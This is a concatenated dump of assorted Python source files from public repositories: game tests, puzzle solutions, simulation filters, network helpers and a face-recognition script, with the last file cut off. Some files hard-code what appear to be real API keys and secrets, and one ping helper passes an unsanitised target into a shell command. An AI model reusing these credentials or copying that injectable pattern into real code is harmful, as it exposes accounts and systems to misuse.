field_name: board.check_if_field_is_empty(field=field_name) for field_name in BOARD_FIELDS_EXPECTED\n }\n self.assertNotIn(\n False, field_emptiness_statuses.values(),\n f\"in default state not all Board fields values were reported as empty:\"\n f\"reported: {field_emptiness_statuses}\"\n )\n\n for _field_name in BOARD_FIELDS_EXPECTED:\n _field_val = getattr(board, _field_name)\n self.assertEqual(\n _field_val, FIELD_EMPTY_VAL,\n f\"Board in default state reported a non-empty `{_field_name}` value:\"\n f\"reported: {_field_val}, expected: {FIELD_EMPTY_VAL}\"\n )\n \n self.assertEqual(\n board.check_if_board_is_full(), (False, 0),\n \"Board in default state reported to be full\"\n )\n\n self.assertFalse(board.win_board(), \"Board in default state reported win condition as met\")\n\n self.assertFalse(\n board.end_game,\n f\"Board in default state reported game end condition to be True - `end_game`={board.end_game}\"\n )\n\n self.assertFalse(\n board.last_move,\n f\"Board in default state reported last move dump as populated - `last_move`={board.last_move}\"\n )\n\n self.assertIsNone(\n board.game,\n f\"Board in default state reported game as populated - `game`={board.game}\"\n )\n\n # game_time = board.get_game_time()\n # self.assertEquals(\n # game_time, 0,\n # f\"Board in default state reported non-0 game time: {game_time}\"\n # )\n\n # @tag('enabled')\n def test_game_default_state(self):\n pass","repo_name":"infoshareacademy/jpydzr1-dkmap-django","sub_path":"tests/test_game/test_game_models.py","file_name":"test_game_models.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38656640783","text":"t = int(input())\ndef dfs(x, level):\n global ans\n if level > ans :\n ans = level\n return\n for i in graph[x]:\n if not visited[i]:\n visited[i] = 1\n dfs(i, level+1)\n visited[i] = 0\n\nfor tc in range(1, t + 1):\n n,m = map(int,input().split())\n if m == 0:\n print('#{} {}'.format(tc, 0))\n else:\n v = [list(map(int, input().split())) for _ in range(m)]\n graph = [[] for i in range(n+1)]\n ans = -1\n for i in range(m):\n a,b = v[i]\n graph[a].append(b)\n graph[b].append(a)\n for i in range(1,n+1):\n visited = [0] * (n+1)\n dfs(i, 0)\n print('#{} {}'.format(tc, ans))\n\n\n\n","repo_name":"toki0411/Algorithm","sub_path":"SWEA/D3/2814. 최장 경로/최장 경로.py","file_name":"최장 경로.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30049219132","text":"import logging\nimport os\nfrom os import path\n\nSCRIPT_PATH = path.dirname(path.abspath(__file__))\n\nLOGS_PATH = path.join(SCRIPT_PATH, \"logs\")\nif not path.exists(LOGS_PATH):\n os.makedirs(LOGS_PATH, exist_ok=True)\n\nLOGGER = logging.getLogger(__name__)\nLOGGER.setLevel(logging.INFO)\nfile_handler = logging.FileHandler(path.join(LOGS_PATH, \"fv.log\"))\nformatter = logging.Formatter(\"%(asctime)s : %(levelname)s : %(name)s : %(message)s\")\nfile_handler.setFormatter(formatter)\nLOGGER.addHandler(file_handler)","repo_name":"AntoineDona/Connect4","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21238403826","text":"import requests\nimport datetime\n\njson = {\n \"x-app-id\": \"287c85c7\",\n \"x-app-key\": \"5a50f94763fb437309102af392c30a03\",\n \"Content-Type\": \"application/json\"\n}\n\njson1 = {\n \"query\": input(\"What did you do today: \"),\n \"gender\": \"male\",\n \"weight_kg\": 81,\n \"height_cm\": 183,\n \"age\": 20\n}\n\ndate = datetime.date.today()\ntime = str(datetime.datetime.now().hour) + \":\" + str(datetime.datetime.now().minute) + \":\" + str(datetime.datetime.now().second)\na = requests.post(\"https://trackapi.nutritionix.com/v2/natural/exercise\", json = json1, headers=json)\nsheet_inputs = {\n \"sheet1\": {\n \"date\": str(date),\n \"time\": str(time),\n \"exercise\": a.json()[\"exercises\"][0][\"user_input\"],\n \"duration\": str(a.json()[\"exercises\"][0][\"duration_min\"]),\n \"calories\": str(a.json()[\"exercises\"][0][\"nf_calories\"]),\n }\n }\nrequests.post(\"https://api.sheety.co/e727c248aeb3c57bae687178bfc5a928/untitledSpreadsheet/sheet1\", json = sheet_inputs, headers = { \"Authorization Header\": \"Bearer Ksfaq137\"})","repo_name":"Townsend0/habit-tracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42121460393","text":"# missing functions\r\n# * ATTACK ... in General\r\n# * BLINK\r\n\r\nimport battlecode as bc\r\nimport random\r\nfrom datetime import datetime\r\n\r\ngc = bc.GameController()\r\ndirections = list(bc.Direction)\r\nmy_team = gc.team()\r\nenemy_team = bc.Team.Red\r\nif my_team == bc.Team.Red:\r\n\tenemy_team = bc.Team.Blue\r\nrandom.seed(datetime.now())\r\n\r\nclass MageClass(object):\r\n\r\n\tdef __init__(self):\r\n\t\tself.marsMap = bc.GameMap.mars_map\r\n\t\tself.earthMap = bc.GameMap.earth_map\r\n\t\t\r\n\t\tself.marsHeight = self.marsMap.height\r\n\t\tself.marsWidth = self.marsMap.width\r\n\t\t\r\n\t\tself.earthHeight = self.earthMap.height\r\n\t\tself.earthWidth = self.earthWidth.width\r\n\t\t\r\n\t\tself.NUMBER_OF_GUESSES = 5\r\n\r\n\tdef blink_attack_mars(self, unit):\r\n\t\tif not gc.is_blink_ready(unit.id):\r\n\t\t\treturn\r\n\t\tif bc.ResearchInfo.get_level(bc.UnitType.Mage) < 4:\r\n\t\t\treturn\r\n\t\t\t\r\n\t\tlocation = unit.location\r\n\t\t\t\r\n\t\tpossible_targets = sense_nearby_units_by_team(location.map_location(), 2, enemy_team)\r\n\t\tif len(possible_targets) > 2:\r\n\t\t\treturn\r\n\t\t\t\r\n\t\tfor guess in range(self.NUMBER_OF_GUESSES):\r\n\t\t\ti = random.randint(0, self.marsHeight-1)\r\n\t\t\tj = random.randint(0, self.marsWidth-1)\r\n\t\t\t\r\n\t\t\ttry:\r\n\t\t\t\ttemp_location = bc.MapLocation(bc.Planet.Mars, i, j)\r\n\t\t\t\tif gc.can_blink(unit.id, temp_location):\r\n\t\t\t\t\tgc.blink(unit.id, temp_location)\r\n\t\t\t\t\treturn\r\n\t\t\t\t\t\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint('Error:', e)\r\n\t\t\t\t# use this to show where the error was\r\n\t\t\t\ttraceback.print_exc()\r\n\r\n\tdef blink_attack_earth(self, unit):\r\n\t\tif not gc.is_blink_ready(unit.id):\r\n\t\t\treturn\r\n\t\tif bc.ResearchInfo.get_level(bc.UnitType.Mage) < 4:\r\n\t\t\treturn\r\n\t\t\t\r\n\t\tlocation = unit.location\r\n\t\t\r\n\t\tpossible_targets = sense_nearby_units_by_team(location.map_location(), 2, enemy_team)\r\n\t\tif len(possible_targets) > 2:\r\n\t\t\treturn\r\n\t\t\t\t\r\n\t\tfor guess in range(self.NUMBER_OF_GUESSES):\r\n\t\t\ti = random.randint(0, self.earthHeight-1)\r\n\t\t\tj = random.randint(0, self.earthWidth-1)\r\n\t\t\t\r\n\t\t\ttry:\r\n\t\t\t\ttemp_location = bc.MapLocation(bc.Planet.Earth, i, j)\r\n\t\t\t\tif gc.can_blink(unit.id, temp_location):\r\n\t\t\t\t\tgc.blink(unit.id, temp_location)\r\n\t\t\t\t\treturn\r\n\t\t\t\t\t\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint('Error:', e)\r\n\t\t\t\t# use this to show where the error was\r\n\t\t\t\ttraceback.print_exc()\r\n","repo_name":"AnPelec/Battlecode-2018","sub_path":"Helping Modules/mage.py","file_name":"mage.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12187640737","text":"import os\nfrom shutil import copy\n\nsource_base_dir = \"../data2/autoscout/images/\"\ndestination_base_dir = \"../data2/autoscout-data/\"\n\nfor make in os.listdir(source_base_dir):\n make_dir = source_base_dir + make + '/'\n # if make <= 'Buick':\n # print(\"Skipping make %s \" % make)\n # continue\n\n for sub_d in os.listdir(make_dir):\n model = sub_d\n model_dir = make_dir + model + '/'\n\n print(\"Doing %s %s\"% (make, model))\n for f in os.listdir(model_dir):\n destination = destination_base_dir + ( make + '-' + model ) + '/'\n if not os.path.isdir(destination):\n os.makedirs(destination)\n source = model_dir + f\n try:\n copy(source, destination)\n except Exception as e:\n print(e)\n","repo_name":"banda13/Carrecognizer","sub_path":"helpers/scout-data-preloader.py","file_name":"scout-data-preloader.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31969593929","text":"import sys\nimport itertools\nimport math\nimport collections\n\nwhich = \"sample\"\n\n\nTicket = collections.namedtuple('Ticket', 'seat buyer')\n\ndef solve(n_seats, n_buyers, tickets):\n if n_buyers != 2: return\n print(n_seats, n_buyers, tickets)\n\n by_seat = collections.defaultdict(set)\n by_buyer = collections.defaultdict(set)\n for t in tickets:\n by_seat[t.seat].add(t)\n by_buyer[t.buyer].add(t)\n\n print('seat', dict(by_seat))\n print('buyer', dict(by_buyer))\n print()\n\n\nsys.stdin = open('{}.in'.format(which))\n# sys.stdout = open('{}.out'.format(which), 'w')\n\nT = int(input())\n\nfor i in range(T):\n N, C, M = map(int, input().split())\n tickets = [\n Ticket(*(int(x) -1 for x in input().split()))\n for i in range(M)\n ]\n res = solve(N, C, tickets)\n print(\"Case #{}: {}\".format(i+1, res))\n","repo_name":"eric-wieser/codejam","sub_path":"2017/2/b/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26995921183","text":"\"\"\"\nFile: swift_particle_filtering.py\n\nAuthor: Christopher Rowe\nVesion: 1.0.0\nDate: 29/03/2023\n\nComputes filters for SWIFT particle datasets.\n\nPublic API:\n\n class ParticleFilter\n\nDependancies:\n\n numpy\n QuasarCode\n sph_map.py (local file)\n swift_data_expression.py (local file)\n swiftsimio\n typing\n\"\"\"\n\nimport numpy as np\nfrom QuasarCode.Tools import ScriptWrapper\nimport swiftsimio as sw\nfrom typing import List, Union\n\nfrom ..io.swift_data_expression import parse_string\nfrom ..io.swift_parttype_enum import PartType\n\nclass ParticleFilter(object):\n @staticmethod\n def _calculate_filter(data_root_node: sw.SWIFTDataset, limit_fields: Union[str, List[str]], limit_units: Union[str, List[str]], limits_min: Union[None, float, List[float]] = None, limits_max: Union[None, float, List[float]] = None, **kwargs):\n # Handle formatting for there only being one item\n if isinstance(limit_fields, str):\n limit_fields = [limit_fields]\n limit_units = [limit_units]\n if limits_min is not None:\n limits_min = [limits_min]\n if limits_max is not None:\n limits_max = [limits_max]\n\n manual_filter = np.full(parse_string(limit_fields[0], data_root_node).shape[0], True)\n\n for i, field in enumerate(limit_fields):\n field_value = parse_string(field, data_root_node).to(limit_units[i])\n if limits_min is not None and limits_min[i] is not None:\n manual_filter = manual_filter & (field_value >= limits_min[i])\n if limits_max is not None and limits_max[i] is not None:\n manual_filter = manual_filter & (field_value <= limits_max[i])\n\n return manual_filter\n\n def __init__(self, data_root_node: sw.SWIFTDataset, limit_fields: Union[str, List[str]], limit_units: Union[str, List[str]], limits_min: Union[None, float, List[float]] = None, limits_max: Union[None, float, List[float]] = None):\n self.__filter = ParticleFilter._calculate_filter(data_root_node, limit_fields, limit_units, limits_min, limits_max)\n self.__n_items = self.__filter.sum()\n\n def __call__(self, dataset):\n return dataset[self.__filter]\n \n def __len__(self):\n return self.__n_items\n\n @property\n def numpy_filter(self):\n return self.__filter\n \n def update(self, additional_filter: np.ndarray):\n len_new_items = additional_filter.shape[0]\n len_self_items = self.__filter.shape[0]\n\n if len_new_items > len_self_items:\n # New filter is a larger array than the current filter! This is not compattible.\n raise ValueError(\"The new filter has a length of {}. This is larger than (and therfore, incompatible with) the current filter size of {}.\".format(len_new_items, len_self_items))\n elif len_new_items == len_self_items:\n # Same lengths, just do a simple logical and.\n #print(self.__filter)\n #print(type(self.__filter))\n #print(self.__filter[0])\n #print(additional_filter)\n #print(type(additional_filter))\n #print(additional_filter[0])\n self.__filter = self.__filter & additional_filter\n self.__n_items = self.__filter.sum()\n elif len_new_items != len(self):\n # New filter has a size that isn't consistent with the currently filtered subset.\n raise ValueError(\"The new filter has a length of {}. This is smaller than the current filter size of {}, but also not the same as (and therfore, incompatible with) the current filtered subset size of {}.\".format(len_new_items, len_self_items, len(self)))\n elif additional_filter.sum() > 0:\n # Apply to the filtered subset.\n self.__filter[np.where(self.__filter)[0][additional_filter == False]] = False\n self.__n_items = self.__filter.sum()\n else:\n # New filter was valid, but would remove all items. Just overwrite internal filter.\n self.__filter = np.full_like(self.__filter, False)\n self.__n_items = 0\n\n @staticmethod\n def passthrough_filter(data_file: sw.SWIFTDataset, part_type: PartType):\n return ParticleFilter(part_type.get_dataset(data_file), \"masses\", \"Msun\", None, None)\n\n @staticmethod\n def get_command_params():\n return [[\"limit-fields\", None, \"Names (or expressions with no spaces) as a semicolon seperated list of the data set to be used for filtering the list of particles.\", False, False, ScriptWrapper.make_list_converter(\";\"), None],\n [\"limit-units\", None, \"Unit expression for the limits specified. Uses a semicolon seperated list.\", False, False, ScriptWrapper.make_list_converter(\";\"), None],\n [\"limits-min\", None, \"\", False, False, ScriptWrapper.make_list_converter(\";\", float), None],\n [\"limits-max\", None, \"\", False, False, ScriptWrapper.make_list_converter(\";\", float), None]]\n \n @staticmethod\n def check_limits_present(limit_fields: Union[None, str, List[str]] = None, **kwargs):\n return limit_fields is not None\n","repo_name":"QuasarX1/PhD_HPC_Scripts","sub_path":"contra/filters/swift_particle_filtering.py","file_name":"swift_particle_filtering.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72781496146","text":"# -*- coding:utf-8 -*-\n\"\"\"\n net.py\n ~~~~~~~~\n 网络相关助手函数\n\n :author: Fufu, 2021/6/9\n\"\"\"\nimport math\nimport os\nimport re\nfrom asyncio import create_subprocess_shell, subprocess\nfrom socket import AF_INET, AF_INET6, SOCK_STREAM, socket\nfrom typing import Any, Optional, Tuple, Union\n\nfrom aiohttp import ClientSession, TCPConnector\nfrom icmplib import async_ping\nfrom loguru import logger\n\nfrom .helper import get_int, get_json_loads, get_round\n\n\nasync def request(\n url: str,\n method: str = 'POST',\n *,\n as_json: bool = True,\n throw: bool = False,\n **kwargs: Any,\n) -> Union[dict, Tuple[Any]]:\n \"\"\"发起 HTTP 请求(异步)\"\"\"\n async with ClientSession(connector=TCPConnector(ssl=False)) as client:\n try:\n async with client.request(method, url, **kwargs) as resp:\n res = await resp.text()\n return get_json_loads(res) if as_json else (res, resp.status, dict(resp.headers))\n except Exception as e:\n logger.debug('Exception: {}, {}: {}', e, method, url)\n if throw:\n raise e\n return {} if as_json else ('', 504, {})\n\n\nasync def ping(target: str, count: int = 3, timeout: int = 1000, interval: float = 1.0):\n \"\"\"\n PING 目标网络, 获取延迟丢包 (备用)\n 调用 Windows/Linux 系统 PING 命令, 支持 IPv6\n\n :param target: 目标地址\n :param count: 发送的回显请求数\n :param timeout: 超时时间, Windows 有效\n :param interval: Linux 每次 PING 的时隔\n :return:\n \"\"\"\n err_value = 5000\n windows = os.name == 'nt'\n ret = {\n 'loss': err_value,\n 'minimum': err_value,\n 'maximum': err_value,\n 'average': err_value,\n }\n\n if windows:\n cmd = f'ping -w {timeout} -n {count} {target}'\n else:\n timeout = math.ceil(count * interval)\n cmd = f'ping -i {interval} -c {count} -w {timeout} {target}'\n\n process = await create_subprocess_shell(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n # 等待该子进程运行结束\n stdout, errout = await process.communicate()\n\n if len(errout) > 0:\n return ret\n\n # 运行结果\n res = stdout.decode('gbk', 'ignore').strip()\n\n # 丢包率 %\n loss = re.findall(r'(\\d+)%', res)\n if loss:\n ret['loss'] = get_round(loss[0], err_value)\n\n # 延迟\n patt = r'(\\d+)ms.*? (\\d+)ms.*? (\\d+)ms' if windows else r'([\\d.]+)/([\\d.]+)/([\\d.]+)'\n delay = re.findall(patt, res)\n if delay and len(delay[0]) == 3:\n delay = [get_round(x, err_value) for x in delay[0]]\n ret['minimum'] = delay[0]\n if windows:\n ret['maximum'] = delay[1]\n ret['average'] = delay[2]\n else:\n ret['maximum'] = delay[2]\n ret['average'] = delay[1]\n\n return ret\n\n\nasync def pyping(target: str, count: int = 3, timeout: float = 0.7, interval: float = 0.1):\n \"\"\"\n PING 目标网络, 获取延迟丢包\n 基于 icmplib, 支持 IPv6\n\n :param target: 目标地址\n :param count: 发送的回显请求数\n :param timeout: 超时时间\n :param interval: Linux 每次 PING 的时隔\n :return:\n \"\"\"\n host = await async_ping(target, count=count, timeout=timeout, interval=interval)\n if host.is_alive:\n return {\n 'loss': get_round(host.packet_loss * 100),\n 'minimum': host.min_rtt,\n 'maximum': host.max_rtt,\n 'average': host.avg_rtt,\n }\n\n return {\n 'loss': 100,\n 'minimum': 5000,\n 'maximum': 5000,\n 'average': 5000,\n }\n\n\ndef chk_port(\n ip: Union[str, tuple, list],\n port: Optional[int] = None,\n as_ipv6: bool = False,\n timeout: int = 5,\n) -> Tuple[bool, int]:\n \"\"\"\n 检查 TCP 端口连通性\n\n e.g.::\n\n chk_port('baidu.com', 443)\n chk_port('baidu.com:443')\n chk_port(('baidu.com', 443))\n chk_port('baidu.com')\n chk_port('[::1]:443', as_ipv6=True)\n\n :param ip:\n :param port: 默认 80\n :param as_ipv6:\n :param timeout: 超时秒数\n :return:\n \"\"\"\n if not port:\n ip_port = ip if isinstance(ip, (list, tuple)) else str(ip).rsplit(':', 1)\n ip, port = ip_port if len(ip_port) > 1 else (ip_port, None)\n\n try:\n with socket(AF_INET6 if as_ipv6 else AF_INET, SOCK_STREAM) as s:\n s.settimeout(get_int(timeout, 5))\n x = s.connect_ex((str(ip), get_int(port, 80)))\n s.settimeout(None)\n return x == 0, x\n except Exception:\n pass\n\n return False, -1\n","repo_name":"fufuok/PyAgent","sub_path":"src/libs/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"4823633840","text":"\"\"\"使用百度云接口和人脸库完成本地合影图片的多人脸识别\"\"\"\nfrom aip import AipFace\nimport base64\nimport dlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math,cv2\nimport os, glob,math\nfrom skimage import io\n\n\"\"\"\n人脸特征点检测 栽植模压模压顶替\n\"\"\"\n\n\n\n\ndef rect_to_bb(rect): # 获得人脸矩形的坐标信息\n x = rect.left()\n y = rect.top()\n w = rect.right() - x\n h = rect.bottom() - y\n return (x, y, w, h)\n\n\"\"\"\n人脸对齐\n\"\"\"\ndef face_alignment(faces):\n predictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\") # 用来预测关键点\n faces_aligned = []\n for face in faces:\n rec = dlib.rectangle(0,0,face.shape[0],face.shape[1])\n shape = predictor(np.uint8(face),rec) # 注意输入的必须是uint8类型\n \n order = [36,45,30,48,54] # left eye, right eye, nose, left mouth, right mouth 注意关键点的顺序,这个在网上可以找\n for j in order:\n x = shape.part(j).x\n y = shape.part(j).y\n #cv2.circle(face, (x, y), 2, (0, 0, 255), -1) #测试加还是不加\n\n eye_center =((shape.part(36).x + shape.part(45).x) * 1./2, # 计算两眼的中心坐标\n (shape.part(36).y + shape.part(45).y) * 1./2)\n dx = (shape.part(45).x - shape.part(36).x) # note: right - right\n dy = (shape.part(45).y - shape.part(36).y)\n\n angle = math.atan2(dy,dx) * 180. / math.pi # 计算角度\n RotateMatrix = cv2.getRotationMatrix2D(eye_center, angle, scale=1) # 计算仿射矩阵\n RotImg = cv2.warpAffine(face, RotateMatrix, (face.shape[0], face.shape[1])) # 进行放射变换,即旋转\n faces_aligned.append(RotImg)\n return faces_aligned\n\ndef feature(path,foces):\n im_raw =cv2.imread(foces).astype('uint8') \n detector = dlib.get_frontal_face_detector()\n gray = cv2.cvtColor(im_raw, cv2.COLOR_BGR2GRAY)\n rects = detector(gray, 1)\n src_faces = []\n for (i, rect) in enumerate(rects):\n (x, y, w, h) = rect_to_bb(rect)\n detect_face = im_raw[y:y+h,x:x+w]\n src_faces.append(detect_face)\n cv2.rectangle(im_raw, (x, y), (x + w, y + h), (0, 255, 0), 2)\n cv2.putText(im_raw, \"Face: {}\".format(i + 1), (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n faces_aligned = face_alignment(src_faces)\n #cv2.imshow(\"src\", im_raw) \n for j in os.listdir(path): #清空拟装合影照片中分离人脸目录中的文件\n os.remove(path+'\\\\'+j) \n i = 0\n for face in faces_aligned:\n #cv2.imshow(\"det_{}\".format(i), face)\n i = i + 1 \n io.imsave(path+'\\\\'+'Face{}.jpg'.format(i),face)\n #cv2.imshow(\"Output\", im_raw)\n cv2.waitKey(0)\n\ndef AipFaceRecognition(pathfile):\n \n with open(pathfile,\"rb\") as f: \n # b64encode是编码\n base64_data = base64.b64encode(f.read())\n image = str(base64_data,'utf-8')\n imageType = \"BASE64\" #3种\"URL\",\"FACE_TOKEN\"\n groupIdList = \"qq\" #你上传百度人脸库照片,用户组ID名叫\"qq\"\n \"\"\" 调用人脸搜索 \"\"\"\n a=client.search(image, imageType,groupIdList) \n #print(a['user_list'][2][ 'user_id'],a['user_list'][3][ 'score'])\n return a #['result']['user_list'][0]['user_id']\n\n\nif __name__ == \"__main__\":\n focePath=r'C:\\Users\\Administrator\\Desktop\\1234.jpg' #合影照片\n \"\"\"合影照片中分离人脸子目录\"\"\"\n path = r'zkk' \n \"\"\" 你的 APPID AK SK \"\"\"\n APP_ID = '15427306'\n API_KEY = 'MUlz7ihrX5BiKcOLo6EGRfbq'\n SECRET_KEY = 'vt0Ob07UWpgOiyiKceacv0IqAzACxsCy'\n client = AipFace(APP_ID, API_KEY, SECRET_KEY)\n \n feature(path,focePath)\n userlist=[]\n for i in os.listdir(path):\n pathfile=path+'\\\\'+i\n A=AipFaceRecognition(pathfile)\n if A.get('result',None) !=None:\n if A['result']['user_list'][0]['score']>50: #取相似值大于50%\n #print('{}照片同{}相似度为{}'.format(i,A['result']['user_list'][0]['user_id'],A['result']['user_list'][0]['score']))\n print('{}照片同{}相似'.format(i,A['result']['user_list'][0]['user_id']))\n \n","repo_name":"smists/face","sub_path":"face1.py","file_name":"face1.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35914715648","text":"class Node:\r\n \"\"\"\r\n A class for a node in a singly-linked list, storing\r\n a data payload and links to next node.\r\n \"\"\"\r\n\r\n def __init__(self, data = None, next = None):\r\n \"\"\"Initialize the node with data payload and link to next node.\"\"\"\r\n self.data = data\r\n self.next = next\r\n\r\n def getdata(self):\r\n \"\"\"Get the node's data payload.\"\"\"\r\n return self.data\r\n\r\n def setdata(self, data = None):\r\n \"\"\"Set the node's data payload.\"\"\"\r\n self.data = data\r\n\r\n def getnext(self):\r\n \"\"\"Get the next linked node.\"\"\"\r\n return self.next\r\n\r\n def setnext(self, node = None):\r\n \"\"\"Set the next linked node.\"\"\"\r\n self.next = node\r\n\r\nclass LinkedList:\r\n \"\"\"\r\n A singly linked list.\r\n \"\"\"\r\n\r\n def __init__(self, data=None, head=None):\r\n self.data = data\r\n self.head = head\r\n \r\n def __iter__(self):\r\n \"\"\"Returns a forward iterator over the list.\"\"\"\r\n node = self.head\r\n while node is not None:\r\n yield node.getdata()\r\n node = node.getnext()\r\n\r\n def __str__(self):\r\n \"\"\"Returns a string representation of the list.\"\"\"\r\n return \" -> \".join([str(x) for x in self])\r\n\r\n def __repr__(self):\r\n \"\"\"Returns a printable representation of the list.\"\"\"\r\n return str(self)\r\n\r\n def __len__(self):\r\n \"\"\"Returns the length of the list.\"\"\"\r\n size = 0\r\n for i in self:\r\n size += 1\r\n return size\r\n def push(self, data):\r\n \"\"\"\r\n Adds a new item to the end of the list.\r\n param data: The new item to append to the list.\r\n returns: None\r\n \"\"\"\r\n if self.head is None:\r\n node = Node()\r\n node.setdata(data)\r\n node.setnext(None)\r\n self.head = node\r\n\r\n else:\r\n node = Node()\r\n node.setdata(data)\r\n itr = self.head\r\n while itr.next:\r\n itr = itr.next\r\n itr.next = node\r\n\r\ndef mergeLists(baseList, tailList):\r\n itr = baseList.head\r\n while itr.next:\r\n itr = itr.next\r\n itr.next = tailList.head\r\n return baseList\r\n\r\n\r\ndef intersection(listA, listB):\r\n lenA = len(listA)\r\n lenB = len(listB)\r\n offset = abs(lenA-lenB)\r\n print(\"Offset: \",offset)\r\n currA = listA.head\r\n currB = listB.head\r\n ## length of listA greater then listB; then offset the listA\r\n if lenA > lenB:\r\n for i in range(offset):\r\n currA = currA.next\r\n ## length of listB greater then listA; then offset the listB\r\n elif lenB > lenA:\r\n for i in range(offset):\r\n currB = currB.next\r\n #print(currA.data)\r\n #print(currB.data)\r\n while currA != None:\r\n #while currA.next:\r\n if currA == currB:\r\n return currA\r\n else:\r\n currA = currA.next\r\n currB = currB.next\r\n\r\n\r\nif __name__ == \"__main__\":\r\n mergeList = LinkedList()\r\n #mergeList.push(130)\r\n #mergeList.push(180)\r\n mergeList.push(190)\r\n\r\n listA = LinkedList()\r\n listA.push(10)\r\n listA.push(11)\r\n listA.push(13)\r\n listA.push(12)\r\n listA.push(15)\r\n listA.push(16)\r\n listA.push(18)\r\n listA=mergeLists(listA,mergeList)\r\n\r\n listB = LinkedList()\r\n listB.push(14)\r\n listB.push(17)\r\n listB.push(19)\r\n listB.push(20)\r\n listB=mergeLists(listB,mergeList)\r\n \r\n\r\n ##two lists created listA and listB\r\n print(\"List A: \",listA)\r\n print(\"List A length\",len(listA))\r\n print(\"List B: \",listB)\r\n print(\"List B length\",len(listB))\r\n common = intersection(listA, listB)\r\n #print(\"First Common: \",intersection(listA, listB).data)\r\n #print(\"First Common: \",intersection(listA, listB))\r\n print(\"First Common element data: \",common.data)\r\n print(\"First Common element: \",common)","repo_name":"deena-dayalan/algorithm","sub_path":"LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11700791084","text":"from __future__ import division, print_function\n\n# Import Python modules\nimport os\nimport sys\n\n# Import Broadband modules\nimport cc\nimport bband_utils\n\nclass BBToolboxCfg(object):\n \"\"\"\n Define the configuration parameters for the SDSU BBToolbox program\n \"\"\"\n cfgdict = {}\n\n def getval(self, attr):\n try:\n val = self.cfgdict[attr]\n except KeyError:\n print(\"Invalid Source File - Missing attribute: %s\" % (attr))\n print(\"Exiting\")\n sys.exit(1)\n return val\n\n def parse_src(self, a_srcfile):\n \"\"\"\n This function calls bband_utils's parse property file function\n to get a dictionary of key, value pairs and then looks for a\n the parameters needed by bbtoolbox\n \"\"\"\n self.cfgdict = bband_utils.parse_properties(a_srcfile)\n\n val = self.getval(\"depth_to_top\")\n self.DEPTH_TO_TOP = float(val)\n\n val = self.getval(\"fault_length\")\n self.LENGTH = float(val)\n\n val = self.getval(\"dip\")\n self.DIP = float(val)\n\n val = self.getval(\"rake\")\n self.RAKE = float(val)\n\n val = self.getval(\"hypo_along_stk\")\n self.HYPO_ALONG_STK = float(val)\n\n val = self.getval(\"hypo_down_dip\")\n self.HYPO_DOWN_DIP = float(val)\n\n val = self.getval(\"magnitude\")\n self.MAG = float(val)\n\n val = self.getval(\"seed\")\n self.SEED = int(float(val))\n\n # Now look for the optional grid parameters\n if 'grid_x' in self.cfgdict:\n self.grid_x = float(self.getval(\"grid_x\"))\n if 'grid_y' in self.cfgdict:\n self.grid_y = float(self.getval(\"grid_y\"))\n if 'grid_z' in self.cfgdict:\n self.grid_z = float(self.getval(\"grid_z\"))\n\n #\n # Read parameters out of the source file to obtain parameters\n # needed by the BBcoda codes\n #\n fcodes = cc.find_fx_fy_fz(self.HYPO_ALONG_STK,\n self.LENGTH,\n self.DIP,\n self.HYPO_DOWN_DIP,\n self.DEPTH_TO_TOP)\n self.fsx = fcodes[0]\n self.fsy = fcodes[1]\n self.fsz = fcodes[2]\n #print (\"ETH conversion from hypalongstk: \"\n # \"%f flength: %f dip: %f hypdowndip: %f depthtotop: %f\\n\" %\n # (self.HYPO_ALONG_STK,\n # self.LENGTH,\n # self.DIP,\n # self.HYPO_DOWN_DIP,\n # self.DEPTH_TO_TOP))\n #print (\"resulting fsx: %f fxy: %f fsz: %s\\n\" % (self.fsx,\n # self.fsy,\n # self.fsz))\n\n def calculate_stress(self):\n \"\"\"\n This function calculates the stress parameters for SDSU based\n on the depth of the fault. These values are calibrated for use\n in Eastern North America\n \"\"\"\n stress = 16.0 * self.DEPTH_TO_TOP + 225\n stress = stress * 10**6\n\n return stress\n\n def __init__(self, a_srcfile=None):\n \"\"\"\n Set up some parameters for BBToolbox\n \"\"\"\n self.MAG = None\n self.grid_x = None\n self.grid_y = None\n self.grid_z = 125.0\n self.copy_lf_seismograms = True\n\n # Parse src file, if given\n if a_srcfile:\n self.parse_src(a_srcfile)\n\n self.MODALITY = 1\n # GS_FLAG: Don't change it here, override it in the velocity\n # model config file using a 'CODEBASE_SDSU_GS_FLAG = XXX' line\n # 1: Western US (active region),\n # 2: Eastern NA (stable region),\n # 3: Japan\n self.GS_FLAG = 1\n # 